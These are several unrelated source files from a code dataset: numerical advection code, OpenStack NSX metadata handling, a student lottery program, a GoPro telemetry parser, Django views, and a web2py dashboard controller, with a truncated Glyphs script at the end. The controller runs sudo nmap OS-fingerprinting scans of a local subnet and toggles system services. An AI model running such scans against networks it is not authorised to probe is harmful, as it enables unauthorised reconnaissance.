HAVE FRESH VALUES FOR PERIODIC\n u_fac = avg_y(cat_x((uf.bnd[W].val, uf.val, uf.bnd[E].val)))\n v_fac = cat_y((vf.bnd[S].val, avg_y(vf.val), vf.bnd[N].val)) \n w_fac = avg_y(cat_z((wf.bnd[B].val, wf.val, wf.bnd[T].val)))\n \n # -----------------------------------------------------------\n # Specific for transported variable staggered in z direction\n # -----------------------------------------------------------\n if pos == Z:\n\n # Facial values of physical properties including boundary cells\n rho_nod_x = avg_z(avg_x(rho) )\n rho_x_fac = cat_x((rho_nod_x[ :1,:,:], rho_nod_x, rho_nod_x[-1:,:,:]))\n rho_nod_y = avg_z(avg_y(rho) )\n rho_y_fac = cat_y((rho_nod_y[:, :1,:], rho_nod_y, rho_nod_y[:,-1:,:]))\n rho_z_fac = rho # nx, ny, nz\n\n # Facial values of areas including boundary cells\n a_x_fac = cat_x((avg_z(sx[:1,:,:]),\n avg_z(avg_x(sx)),\n avg_z(sx[-1:,:,:])))\n a_y_fac = cat_y((avg_z(sy[:,:1,:]),\n avg_z(avg_y(sy)),\n avg_z(sy[:,-1:,:])))\n a_z_fac = sz\n\n # Facial values of distance between cell centers\n # MODIFY FOR PERIODIC\n del_x = avg_z(cat_x((dx[:1,:,:]*0.5, avg_x(dx), dx[-1:,:,:]*0.5)))\n del_y = avg_z(cat_y((dy[:,:1,:]*0.5, avg_y(dy), dy[:,-1:,:]*0.5)))\n del_z = dz[:,:,:]\n\n # Facial values of velocities without boundary values\n # TAKE CARE YOU HAVE FRESH VALUES FOR PERIODIC\n u_fac = avg_z(cat_x((uf.bnd[W].val, uf.val, uf.bnd[E].val))) \n v_fac = avg_z(cat_y((vf.bnd[S].val, vf.val, vf.bnd[N].val)))\n w_fac = cat_z((wf.bnd[B].val, avg_z(wf.val), wf.bnd[T].val)) \n\n # -----------------------------\n # Common part of the algorithm\n # -----------------------------\n\n # ------------------------------------------------------------------\n #\n # |-W-|-W-|-o-|-o-|-o-|-o-|-o-|-o-|-o-|-o-|-o-|-o-|-E-|-E-|\n # 0 1 2 3 4 5 6 7 8 9 10 11 12 13 phi\n # x---x---x---x---x---x---x---x---x---x---x---x---x\n # 0 1 2 3 4 5 6 7 8 9 10 11 12 d_x\n #\n # x---x---x---x---x---x---x---x---x---x---x\n # 0 1 2 3 4 5 6 7 8 9 10 r_x\n #\n # ------------------------------------------------------------------\n\n # Compute consecutive differences (and avoid division by zero)\n # FILL THE BUFFERS PROPERLY FOR PERIODIC\n d_x = dif_x(cat_x((phi.bnd[W].val, \n phi.bnd[W].val, \n phi.val, \n phi.bnd[E].val,\n phi.bnd[E].val))) \n d_x[(d_x > -TINY) & (d_x <= 0.0)] = -TINY\n d_x[(d_x >= 0.0) & (d_x < +TINY)] = +TINY\n\n d_y = dif_y(phi.val) \n d_y = dif_y(cat_y((phi.bnd[S].val, \n phi.bnd[S].val, \n phi.val, \n phi.bnd[N].val,\n phi.bnd[N].val))) \n d_y[(d_y > -TINY) & (d_y <= 0.0)] = -TINY\n d_y[(d_y >= 0.0) & (d_y < +TINY)] = +TINY\n\n d_z = dif_z(phi.val) \n d_z = dif_z(cat_z((phi.bnd[B].val, \n phi.bnd[B].val, \n phi.val, \n phi.bnd[T].val,\n phi.bnd[T].val))) \n d_z[(d_z > -TINY) & (d_z <= 0.0)] = -TINY\n d_z[(d_z >= 0.0) & (d_z < +TINY)] = +TINY\n\n # Ratio of consecutive gradients for positive and negative flow\n r_x_we = d_x[1:-1,:,:] / d_x[0:-2,:,:] \n r_x_ew = d_x[2:, :,:] / d_x[1:-1,:,:] \n r_y_sn = d_y[:,1:-1,:] / d_y[:,0:-2,:] \n r_y_ns = d_y[:,2:, :] / d_y[:,1:-1,:] \n r_z_bt = d_z[:,:,1:-1] / d_z[:,:,0:-2] \n r_z_tb = d_z[:,:,2: ] / d_z[:,:,1:-1] \n\n flow_we = u_fac >= 0\n flow_ew = lnot(flow_we)\n flow_sn = v_fac >= 0\n flow_ns = lnot(flow_sn)\n flow_bt = w_fac >= 0\n flow_tb = lnot(flow_bt)\n\n r_x = r_x_we * flow_we + r_x_ew * flow_ew\n r_y = r_y_sn * flow_sn + r_y_ns * flow_ns\n r_z = r_z_bt * flow_bt + r_z_tb * flow_tb\n\n # Apply a limiter\n if lim_name == 'upwind':\n psi_x = r_x * 0.0\n psi_y = r_y * 0.0\n psi_z = r_z * 0.0\n elif lim_name == 'minmod':\n psi_x = mx(zeros(r_x.shape),mn(r_x,ones(r_x.shape)))\n psi_y = mx(zeros(r_y.shape),mn(r_y,ones(r_y.shape)))\n psi_z = mx(zeros(r_z.shape),mn(r_z,ones(r_z.shape)))\n elif lim_name == 'superbee':\n psi_x = mx(zeros(r_x.shape),mn(2.*r_x, ones(r_x.shape)),mn(r_x, 2.))\n psi_y = mx(zeros(r_y.shape),mn(2.*r_y, ones(r_y.shape)),mn(r_y, 2.))\n psi_z = mx(zeros(r_z.shape),mn(2.*r_z, ones(r_z.shape)),mn(r_z, 2.))\n elif lim_name == 'koren':\n psi_x = mx(zeros(r_x.shape),mn(2.*r_x,(2.+r_x)/3.,2.*ones(r_x.shape)))\n psi_y = mx(zeros(r_y.shape),mn(2.*r_y,(2.+r_y)/3.,2.*ones(r_y.shape)))\n psi_z = mx(zeros(r_z.shape),mn(2.*r_z,(2.+r_z)/3.,2.*ones(r_z.shape)))\n\n flux_fac_lim_x = cat_x((phi.bnd[W].val, phi.val)) * u_fac * flow_we \\\n + cat_x((phi.val, phi.bnd[E].val)) * u_fac * flow_ew \\\n + 0.5 * abs(u_fac) * (1 - abs(u_fac) * dt / del_x) \\\n * ( psi_x[:,:,:] * d_x[0:-2,:,:] * flow_we \\\n + psi_x[:,:,:] * d_x[1:-1,:,:] * flow_ew )\n flux_fac_lim_y = cat_y((phi.bnd[S].val, phi.val)) * v_fac * flow_sn \\\n + cat_y((phi.val, phi.bnd[N].val)) * v_fac * flow_ns \\\n + 0.5 * abs(v_fac) * (1 - abs(v_fac) * dt / del_y) \\\n * ( psi_y[:,:,:] * d_y[:,0:-2,:] * flow_sn \\\n + psi_y[:,:,:] * d_y[:,1:-1,:] * flow_ns )\n flux_fac_lim_z = cat_z((phi.bnd[B].val, phi.val)) * w_fac * flow_bt \\\n + cat_z((phi.val, phi.bnd[T].val)) * w_fac * flow_tb \\\n + 0.5 * abs(w_fac) * (1 - abs(w_fac) * dt / del_z) \\\n * ( psi_z[:,:,:] * d_z[:,:,0:-2] * flow_bt \\\n + psi_z[:,:,:] * d_z[:,:,1:-1] * flow_tb )\n\n # Multiply with face areas\n flux_fac_lim_x = rho_x_fac * flux_fac_lim_x * a_x_fac\n flux_fac_lim_y = rho_y_fac * flux_fac_lim_y * a_y_fac\n flux_fac_lim_z = rho_z_fac * flux_fac_lim_z * a_z_fac\n\n # Sum contributions from all directions up\n c = dif_x(flux_fac_lim_x) + \\\n dif_y(flux_fac_lim_y) + \\\n dif_z(flux_fac_lim_z)\n\n return c # end of function\n","sub_path":"pyns/discretization/advection.py","file_name":"advection.py","file_ext":"py","file_size_in_byte":12154,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"482718618","text":"# Copyright 2013 VMware, Inc.\n# All Rights Reserved\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n#\n\nfrom eventlet import greenthread\nfrom neutron_lib import constants as const\nfrom neutron_lib import exceptions as ntn_exc\nfrom oslo_config import cfg\nfrom oslo_log import log as logging\n\nfrom neutron.api.rpc.agentnotifiers import dhcp_rpc_agent_api\nfrom neutron.db import db_base_plugin_v2\nfrom neutron.db import models_v2\n\nfrom vmware_nsx._i18n import _LE, _LI, _LW\nfrom vmware_nsx.api_client import exception as api_exc\nfrom vmware_nsx.common import config\nfrom vmware_nsx.common import exceptions as nsx_exc\n\nLOG = logging.getLogger(__name__)\n\nMETADATA_DEFAULT_PREFIX = 30\nMETADATA_SUBNET_CIDR = '169.254.169.252/%d' % METADATA_DEFAULT_PREFIX\nMETADATA_GATEWAY_IP = '169.254.169.253'\nMETADATA_DHCP_ROUTE = '169.254.169.254/32'\n\n\ndef handle_network_dhcp_access(plugin, context, network, action):\n pass\n\n\ndef handle_port_dhcp_access(plugin, context, port_data, action):\n pass\n\n\ndef handle_port_metadata_access(plugin, context, port, is_delete=False):\n # For instances supporting DHCP option 121 and created in a\n # DHCP-enabled but isolated network. This method is useful\n # only when no network namespace support.\n plugin_cfg = getattr(cfg.CONF, plugin.cfg_group)\n if (plugin_cfg.metadata_mode == config.MetadataModes.INDIRECT and\n port.get('device_owner') == const.DEVICE_OWNER_DHCP):\n if not port.get('fixed_ips'):\n # If port does not have an IP, the associated subnet is in\n # deleting state.\n LOG.info(_LI('Port %s has no IP due to subnet in deleting state'),\n port['id'])\n return\n fixed_ip = port['fixed_ips'][0]\n query = context.session.query(models_v2.Subnet)\n subnet = query.filter(\n models_v2.Subnet.id == fixed_ip['subnet_id']).one()\n # If subnet does not have a gateway, do not create metadata\n # route. This is done via the enable_isolated_metadata\n # option if desired.\n if not subnet.get('gateway_ip'):\n LOG.info(_LI('Subnet %s does not have a gateway, the '\n 'metadata route will not be created'),\n subnet['id'])\n return\n metadata_routes = [r for r in subnet.routes\n if r['destination'] == METADATA_DHCP_ROUTE]\n if metadata_routes:\n # We should have only a single metadata route at any time\n # because the route logic forbids two routes with the same\n # destination. Update next hop with the provided IP address\n if not is_delete:\n metadata_routes[0].nexthop = fixed_ip['ip_address']\n else:\n context.session.delete(metadata_routes[0])\n else:\n # add the metadata route\n route = models_v2.SubnetRoute(\n subnet_id=subnet.id,\n destination=METADATA_DHCP_ROUTE,\n nexthop=fixed_ip['ip_address'])\n context.session.add(route)\n\n\ndef handle_router_metadata_access(plugin, context, router_id, interface=None):\n # For instances created in a DHCP-disabled network but connected to\n # a router.\n # The parameter \"interface\" is only used as a Boolean flag to indicate\n # whether to add (True) or delete (False) an internal metadata network.\n plugin_cfg = getattr(cfg.CONF, plugin.cfg_group)\n if plugin_cfg.metadata_mode != config.MetadataModes.DIRECT:\n LOG.debug(\"Metadata access network is disabled\")\n return\n if not cfg.CONF.allow_overlapping_ips:\n LOG.warning(_LW(\"Overlapping IPs must be enabled in order to setup \"\n \"the metadata access network\"))\n return\n ctx_elevated = context.elevated()\n on_demand = getattr(plugin_cfg, 'metadata_on_demand', False)\n try:\n if interface:\n # Add interface case\n filters = {'device_id': [router_id],\n 'device_owner': const.ROUTER_INTERFACE_OWNERS,\n 'fixed_ips': {'ip_address': [METADATA_GATEWAY_IP]}}\n # Retrieve metadata ports by calling database plugin\n ports = db_base_plugin_v2.NeutronDbPluginV2.get_ports(\n plugin, ctx_elevated, filters=filters)\n if not ports and (not on_demand or\n _find_dhcp_disabled_subnet_by_router(\n plugin, ctx_elevated, router_id)):\n _create_metadata_access_network(\n plugin, ctx_elevated, router_id)\n else:\n # Remove interface case\n filters = {'device_id': [router_id],\n 'device_owner': const.ROUTER_INTERFACE_OWNERS}\n # Retrieve router interface ports by calling database plugin\n ports = db_base_plugin_v2.NeutronDbPluginV2.get_ports(\n plugin, ctx_elevated, filters=filters)\n if len(ports) == 1 or (on_demand and not\n _find_dhcp_disabled_subnet_by_port(\n plugin, ctx_elevated, ports)):\n # Delete the internal metadata network if the router port\n # is the last port left or no more DHCP-disabled subnet\n # attached to the router.\n _destroy_metadata_access_network(\n plugin, ctx_elevated, router_id, ports)\n # TODO(salvatore-orlando): A better exception handling in the\n # NSX plugin would allow us to improve error handling here\n except (ntn_exc.NeutronException, nsx_exc.NsxPluginException,\n api_exc.NsxApiException):\n # Any exception here should be regarded as non-fatal\n LOG.exception(_LE(\"An error occurred while operating on the \"\n \"metadata access network for router:'%s'\"),\n router_id)\n\n\ndef _find_metadata_port(plugin, context, ports):\n for port in ports:\n for fixed_ip in port['fixed_ips']:\n if fixed_ip['ip_address'] == METADATA_GATEWAY_IP:\n return port\n\n\ndef _find_dhcp_disabled_subnet_by_port(plugin, context, ports):\n for port in ports:\n for fixed_ip in port['fixed_ips']:\n subnet = plugin.get_subnet(context, fixed_ip['subnet_id'])\n if not subnet['enable_dhcp']:\n return subnet\n\n\ndef _find_dhcp_disabled_subnet_by_router(plugin, context, router_id):\n filters = {'device_id': [router_id],\n 'device_owner': const.ROUTER_INTERFACE_OWNERS}\n ports = db_base_plugin_v2.NeutronDbPluginV2.get_ports(\n plugin, context, filters=filters)\n return _find_dhcp_disabled_subnet_by_port(plugin, context, ports)\n\n\ndef _create_metadata_access_network(plugin, context, router_id):\n # Add network\n # Network name is likely to be truncated on NSX\n net_data = {'name': 'meta-%s' % router_id,\n 'tenant_id': '', # intentionally not set\n 'admin_state_up': True,\n 'port_security_enabled': False,\n 'shared': False,\n 'status': const.NET_STATUS_ACTIVE}\n meta_net = plugin.create_network(context,\n {'network': net_data})\n greenthread.sleep(0) # yield\n plugin.schedule_network(context, meta_net)\n greenthread.sleep(0) # yield\n # From this point on there will be resources to garbage-collect\n # in case of failures\n meta_sub = None\n try:\n # Add subnet\n subnet_data = {'network_id': meta_net['id'],\n 'tenant_id': '', # intentionally not set\n 'name': 'meta-%s' % router_id,\n 'ip_version': 4,\n 'shared': False,\n 'cidr': METADATA_SUBNET_CIDR,\n 'enable_dhcp': True,\n # Ensure default allocation pool is generated\n 'allocation_pools': const.ATTR_NOT_SPECIFIED,\n 'gateway_ip': METADATA_GATEWAY_IP,\n 'dns_nameservers': [],\n 'host_routes': []}\n meta_sub = plugin.create_subnet(context,\n {'subnet': subnet_data})\n greenthread.sleep(0) # yield\n plugin.add_router_interface(context, router_id,\n {'subnet_id': meta_sub['id']})\n greenthread.sleep(0) # yield\n # Tell to start the metadata agent proxy, only if we had success\n _notify_rpc_agent(context, {'subnet': meta_sub}, 'subnet.create.end')\n except (ntn_exc.NeutronException,\n nsx_exc.NsxPluginException,\n api_exc.NsxApiException):\n # It is not necessary to explicitly delete the subnet\n # as it will be removed with the network\n plugin.delete_network(context, meta_net['id'])\n\n\ndef _destroy_metadata_access_network(plugin, context, router_id, ports):\n if not ports:\n return\n meta_port = _find_metadata_port(plugin, context, ports)\n if not meta_port:\n return\n meta_net_id = meta_port['network_id']\n meta_sub_id = meta_port['fixed_ips'][0]['subnet_id']\n plugin.remove_router_interface(\n context, router_id, {'port_id': meta_port['id']})\n greenthread.sleep(0) # yield\n context.session.expunge_all()\n try:\n # Remove network (this will remove the subnet too)\n plugin.delete_network(context, meta_net_id)\n greenthread.sleep(0) # yield\n except (ntn_exc.NeutronException, nsx_exc.NsxPluginException,\n api_exc.NsxApiException):\n # must re-add the router interface\n plugin.add_router_interface(context, router_id,\n {'subnet_id': meta_sub_id})\n # Tell to stop the metadata agent proxy\n _notify_rpc_agent(\n context, {'network': {'id': meta_net_id}}, 'network.delete.end')\n\n\ndef _notify_rpc_agent(context, payload, event):\n if cfg.CONF.dhcp_agent_notification:\n dhcp_notifier = dhcp_rpc_agent_api.DhcpAgentNotifyAPI()\n dhcp_notifier.notify(context, payload, event)\n","sub_path":"vmware_nsx/dhcp_meta/rpc.py","file_name":"rpc.py","file_ext":"py","file_size_in_byte":10614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"428500979","text":"#Função que lê a matriz dada pela comanda do EP\ndef LeiaMatriz (NomeArquivo):\n\tmat = []\n\ttry:\n\t\tarq = open(NomeArquivo, \"r\")\n\texcept:\n\t\tprint(\"Erro na abertura do arquivo (open).\")\n\t\treturn None\n\ti = 0\n\tfor linha in arq:\n\t\ttry:\n\t\t\tlin = linha[:len(linha)-1]\n\t\t\tv = lin.split('\\t')\n\t\t\tmat.append([])\n\t\t\tfor j in range (8):\n\t\t\t\tif j == 1:\n\t\t\t\t\tmat[i].append(v[1])\n\t\t\t\telse:\n\t\t\t\t\tmat[i].append(int(v[j]))\n\t\t\ti += 1\n\t\texcept:\n\t\t\tprint (\"Erro no split(), no int() ou no append().\")\n\t\t\treturn None\n\t#Consistência dos valores da matriz\n #Precisam estar entre 1 e 60, ou seja, [1,60]\n\tna = 0\n\tfor l in range (len(mat)):\n\t\tfor g in range (2,8):\n\t\t\t#Caso não estejam no intervalo [1,60], uma mensagem de erro é impressa\n\t\t\t#Fecha o arquivo\n\t\t\t#Retorna None\n\t\t\tif mat[l][g] > 60 or mat[l][g] < 1:\n\t\t\t\tna = 1\n\t\t\t\tprint(\"Os números apresentados no arquivo devem estar entre 1 e 60. Tente novamente com um arquivo válido.\")\n\t\t\t\tarq.close()\n\t\t\t\treturn None\n #Se os valores estiverem entre 1 e 60 a função retorna mat\n #Programa continua normalmente\n\tif na == 0:\n\t\tarq.close()\n\t\treturn mat\n\n\n#Função que responde as perguntas 1 e 2 da comanda do EP\ndef pergunta1e2 (matriz):\n\t#Cria uma lista com 60 elementos\n\t#Todos eles iguais a 0\n\tp1 = [0]*60\n\t#Faz a contagem de quantas vezes os números de 1 a 60 foram sorteados\n\t#E armazena a contagem na lista p1\n\tfor j in range(60):\n\t\tfor i in range(2,8):\n\t\t\tfor a in range (len(matriz)):\n\t\t\t\t#A partir da matriz parâmetro\n\t\t\t\t#Caso algum elemento dela seja igual a j (entre 1 e 60)\n\t\t\t\tif matriz[a][i] == (j+1):\n\t\t\t\t\t#Adiciona 1 a p1[j]\n\t\t\t\t\t#Que vai servir como contador a partir do index\n\t\t\t\t\t#Ou seja, o index 0 indica o número 1\n\t\t\t\t\t#O valor no index 0 indica quantas vezes o número 1 foi sorteado\n\t\t\t\t\tp1[j] = p1[j] + 1\n\t#Cria uma segunda lista p12 com 60 elementos, todos iguais a 0\n\tp12 = [0]*60\n\t#Armazena os dados de p1 em p12\n\tfor k in range(60):\n\t\tp12[k] = p1[k]\n\t#Ordena p1\n\tp1.sort()\n\t#Coloca em ordem decrescente\n\tp1.reverse()\n\t#Imprime o cabeçalho\n\tprint()\n\tprint(\"Sorteios por número (ordem decrescente)\")\n\tprint()\n\tprint(\" Números Sorteios\")\n\t#Imprime os números sorteados\n\t#E o número de vezes que foram sorteados\n\t#Em ordem decrescente\n\tfor g in range(60):\n\t\tprint(\"%5d %12d\" %((p12.index(p1[g])+1), (p1[g])))\n\t\t#Zera o número que já foi impresso para não acontecer repetições\n\t\tp12[p12.index(p1[g])] = 0\n\n\n#Função que responde as perguntas 3 e 4 da comanda do EP\ndef pergunta3e4 (matriz):\n\t#Imprime ccabeçalho\n\tprint()\n\tprint(\"Data mais recente que cada número foi sorteado\")\n\tprint()\n\tprint(\" Números Sorteios Data\")\n\tprint()\n\t#Cria uma matriz do tamanho da matriz parâmetro\n\t#Com elementos iguais a zero\n\tp14 = [0]*len(matriz)\n\t#Armazena nela os números sorteados\n\tfor y in range (len(matriz)):\n\t\tp14[y] = matriz[y][2:8]\n\t#Ordena os elementos das sublistas em p14\n\t#Ordena os números sorteados em cada sorteio em ordem crescente\n\tfor t in range (len(p14)):\n\t\tp14[t].sort()\n\t#Imprime o número sorteado, o sorteio e a data em que foi sorteado\n\tfor q in range (len(p14)):\n\t\tfor u in range (6):\n\t\t\tif p14[q][u] != 0:\n\t\t\t\tapareceprim = p14[q][u]\n\t\t\t\tprint (\"%5d %12d\" %(p14[q][u], matriz[q][0]), end=\"\")\n\t\t\t\tprint(\" \", matriz[q][1])\n\t\t\t\t#Zera o número que foi impresso\n\t\t\t\tp14[q][u] = 0\n\t\t\t\t#Zera todos os outros iguais que vem depois dele\n\t\t\t\t#Assim não acontece repetições\n\t\t\t\t#E imprime apenas o que foi sorteado na data mais recente\n\t\t\t\tfor t in range (len(p14)):\n\t\t\t\t\tfor b in range (6):\n\t\t\t\t\t\tif p14[t][b] == apareceprim:\n\t\t\t\t\t\t\tp14[t][b] = 0\n\n\n\n\n#Função principal do programa\ndef main():\n\t#Solicita o nome do arquivo\n\tnomearq = str(input(\"Entre com o nome do arquivo:\"))\n\t#Chama a função LeiaMatriz e armazena a matriz mat na variável matt caso o arquivo passe pela consistência\n\tmatt = LeiaMatriz(nomearq)\n\t#Caso não passe pela consistência matt fica como valor None\n\t#Caso isso ocorra, a função main() é executada novamente\n\tif matt == None:\n\t\tmain()\n\t#Se matt não tiver armazenado None\n\t#O programa continua normalmente\n\telse:\n\t\t#Chama a função pergunta1e2 usando a variável matt como parâmetro\n\t\tpergunta1e2(matt)\n\t\t#Chama a função pergunta3e4 usando a variável matt como parâmetro\n\t\tpergunta3e4(matt)\n\nmain()\n\n","sub_path":"Primeiro Semestre - MAC 0110 - Introdução à Computação/Exercício Programa 3/ep3final2.py","file_name":"ep3final2.py","file_ext":"py","file_size_in_byte":4257,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"252820017","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.8 (3413)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.macosx-10.9-x86_64/egg/gopro2gpx/klvdata.py\n# Compiled at: 2020-04-24 06:21:51\n# Size of source mod 2**32: 2160 bytes\nimport struct\nfrom gopro2gpx.fourCC import Manage, skip_labels\n\nclass KLVData:\n __doc__ = '\\n format: Header: 32-bit, 8-bit, 8-bit, 16-bit\\n Data: 32-bit aligned, padded with 0\\n '\n binary_format = '>4sBBH'\n\n def __init__(self, data, offset):\n s = struct.Struct(KLVData.binary_format)\n self.fourCC, self.type, self.size, self.repeat = s.unpack_from(data, offset=offset)\n self.fourCC = self.fourCC.decode()\n self.type = int(self.type)\n self.length = self.size * self.repeat\n self.padded_length = self.pad(self.length)\n self.rawdata = self.readRawData(data, offset)\n self.data = Manage(self)\n\n def __str__(self):\n stype = chr(self.type)\n if self.type == 0:\n stype = 'null'\n elif self.rawdata:\n rawdata = self.rawdata\n rawdata = ' '.join((format(x, '02x') for x in rawdata))\n rawdatas = self.rawdata[0:10]\n else:\n rawdata = 'null'\n rawdatas = 'null'\n s = '%s %s %d %s {%s} |%s| [%s]' % (self.fourCC, stype, self.size, self.repeat, self.data, rawdatas, rawdata)\n return s\n\n def pad(self, n, base=4):\n \"\"\"padd the number so is % base == 0\"\"\"\n i = n\n while i % base != 0:\n i += 1\n\n return i\n\n def skip(self):\n return self.fourCC in skip_labels\n\n def readRawData(self, data, offset):\n \"\"\"read the raw data, don't process anything, just get the bytes\"\"\"\n if self.type == 0:\n return\n else:\n num_bytes = self.pad(self.size * self.repeat)\n if num_bytes == 0:\n rawdata = None\n else:\n fmt = '>' + str(num_bytes) + 's'\n s = struct.Struct(fmt)\n rawdata, = s.unpack_from(data, offset=(offset + 8))\n return rawdata","sub_path":"pycfiles/gopro2gpx-0.1-py3.8/klvdata.cpython-38.py","file_name":"klvdata.cpython-38.py","file_ext":"py","file_size_in_byte":2157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"355138515","text":"from django.shortcuts import render, redirect\nfrom .models import User\n\ndef index(request):\n context= {\n 'all_users': User.objects.all(),\n }\n return render(request, 'index.html', context)\n\n\ndef process(request):\n if request.method == 'POST':\n new_user= User.objects.create(first_name= request.POST['first_name'], last_name= request.POST['last_name'],\n email_address= request.POST['email_address'], age= request.POST['age'])\n print(new_user)\n return redirect('/')","sub_path":"users_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"397558664","text":"# coding=utf-8\nimport commands\nimport itertools\nimport os\nimport platform\nimport re\nimport socket\nimport struct\n\n\ndef login(): ######## Tela Login ########\n return response.render(\"estrutura/login.html\")\n\n\ndef dash(): ######## Tela dashboard ########\n ##qtde_os = qtde_so()\n from subprocess import check_output\n saida_ip_externo = commands.getoutput('sudo curl ifconfig.pro')\n ip_externo = saida_ip_externo.split(\"\\n\")\n\n ips = check_output(['hostname', '--all-ip-addresses'])\n\n return response.render(\"estrutura/dash.html\", ip_externo=ip_externo, ips=ips)\n\n\ndef relatorio(): ######## Tela Relatório ########\n return response.render(\"estrutura/relatorio.html\")\n\n\ndef teste():\n return response.render(\"estrutura/teste.html\")\n\n\ndef scan(): ######## Tela Scan onde 'starta' os scans ########\n return response.render('estrutura/scan.html')\n\n\ndef settings(): ######## Tela de Configurações ########\n ### Serviços - iniciar/parar/reiniciar ###\n server = get_server()\n saida_apache = commands.getoutput('sudo /etc/init.d/apache2 status')\n dict_apache = saida_apache.split(\"\\n\")\n retorno_apache = None\n for line in dict_apache:\n if 'running' in line:\n retorno_apache = 'Ativo'\n break\n else:\n retorno_apache = 'Inativo'\n\n saida_openvpn = commands.getoutput('sudo /etc/init.d/openvpn status')\n dict_openvpn = saida_openvpn.split(\"\\n\")\n retorno_openvpn = None\n for line in dict_openvpn:\n if 'inactive' in line:\n retorno_openvpn = 'Inativo'\n break\n else:\n retorno_openvpn = 'Ativo'\n\n saida_ssh = commands.getoutput('sudo /etc/init.d/ssh status')\n dict_ssh = saida_ssh.split(\"\\n\")\n retorno_ssh = None\n for line in dict_ssh:\n if 'inactive' in line:\n retorno_ssh = 'Inativo'\n break\n else:\n retorno_ssh = 'Ativo'\n\n ### Termina Serviços ###\n\n return response.render('estrutura/settings.html', retorno_apache=retorno_apache, dict_apache=dict_apache,\n dict_openvpn=dict_openvpn, retorno_openvpn=retorno_openvpn, retorno_ssh=retorno_ssh,\n dict_ssh=dict_ssh, server=server)\n\n############################\n\ndef iniciar_servico_apache():\n try:\n os.system('sudo /etc/init.d/apache2 start')\n except Exception as error:\n return error\n\ndef parar_servico_apache():\n try:\n os.system('sudo /etc/init.d/apache2 stop')\n except Exception as error:\n return error\n\n\ndef reiniciar_servico_apache():\n try:\n os.system('sudo /etc/init.d/apache2 restart')\n except Exception as error:\n return error\n\n############################\n\ndef iniciar_servico_openvpn():\n try:\n os.system(\"sudo /etc/init.d/openvpn start\")\n except Exception as error:\n return error\n\ndef parar_servico_openvpn():\n try:\n os.system(\"sudo /etc/init.d/openvpn stop\")\n except Exception as error:\n return error\n\n\ndef reiniciar_servico_openvpn():\n try:\n os.system(\"sudo /etc/init.d/openvpn restart\")\n except Exception as error:\n return error\n\n############################\n\ndef iniciar_servico_ssh():\n try:\n os.system(\"sudo /etc/init.d/ssh start\")\n except Exception as error:\n return error\n\ndef parar_servico_ssh():\n try:\n os.system(\"sudo /etc/init.d/ssh stop\")\n except Exception as error:\n return error\n\n\ndef reiniciar_servico_ssh():\n try:\n os.system(\"sudo /etc/init.d/ssh restart\")\n except Exception as error:\n return error\n\n#######################################################################\n\ndef get_ip(): ### Função que retorna endereço ip das interfaces LAN/WLAN ###\n global ip\n f = os.popen('ifconfig')\n for iface in [' '.join(i) for i in iter(lambda: list(itertools.takewhile(lambda l: not l.isspace(),f)), [])]:\n if re.findall('^(eth|wlan)[0-9]',iface) and re.findall('RUNNING',iface):\n ip = re.findall('(?<=inet\\saddr:)[0-9\\.]+',iface)\n if ip:\n return ip[0]\n return ip\n\n\ndef gateway(): ### Retorna endereço IP do gateway ###\n \"\"\"Read the default gateway directly from /proc.\"\"\"\n with open(\"/proc/net/route\") as fh:\n for line in fh:\n fields = line.strip().split()\n if fields[1] != '00000000' or not int(fields[3], 16) & 2:\n continue\n\n return socket.inet_ntoa(struct.pack(\" /tmp/os; echo \"$(cat /tmp/os | grep -i Windows | wc -l)\"')\n qtde_os['Linux'] = commands.getoutput('sudo nmap --top-ports 1 -O -F -n -Pn -r 192.168.1.0/24 | grep \"Running: \"> /tmp/os; echo \"$(cat /tmp/os | grep -i Linux | wc -l)\"')\n\n return str(qtde_os).replace('{','').replace('}','')\n\n\ndef get_server(): ######## Informações de hardware/software da Raspberry ########\n server = {}\n var = platform.platform()\n server['distribuicao'] = var.split('-')[6]\n server['versao'] = var.split('-')[7]\n server['arch'] = platform.processor()\n server['host'] = platform.uname()[1]\n server['kernel'] = platform.uname()[2]\n server['pythonv'] = platform.python_version()\n server['postgresql'] = commands.getoutput(\"psql --version\")\n server['memory'] = int(commands.getoutput(\"cat /proc/meminfo | grep MemTotal\").split(':')[1].split('k')[0])/1000\n disk = os.statvfs(\"/\")\n totalBytes = float(disk.f_bsize*disk.f_blocks)\n server['disk'] = \"%.2f GBytes\" % (totalBytes/1024/1024/1024)\n\n #var = commands.getoutput(\"atop | grep cpu\")\n return server\n\n\n### Função para mostrar hora real time ###\ndef atualiza_hora():\n from datetime import datetime\n item = str(datetime.now().strftime('%H:%M:%S - %d/%m/%Y'))\n\n return item\n","sub_path":"controllers/control.py","file_name":"control.py","file_ext":"py","file_size_in_byte":6464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"248574818","text":"# encoding: utf-8\nfrom __future__ import division, print_function, unicode_literals\n\nimport SegmentsPen\n\nfrom GlyphsApp import *\n\nfrom Foundation import NSBundle, NSOffsetRect, NSIntersectsRect, NSPointInRect, NSMinX, NSMinY, NSMaxX, NSMaxY\nimport objc\n_path = NSBundle.mainBundle().bundlePath()\n_path = _path+\"/Contents/Frameworks/GlyphsCore.framework/Versions/A/Resources/BridgeSupport/GlyphsCore.bridgesupport\"\nf = open(_path)\nobjc.parseBridgeSupport(f.read(), globals(), _path)\nf.close()\n\ndef segmentInBound(segment, bounds):\n minX = NSMinX(bounds)\n minY = NSMinY(bounds)\n maxX = 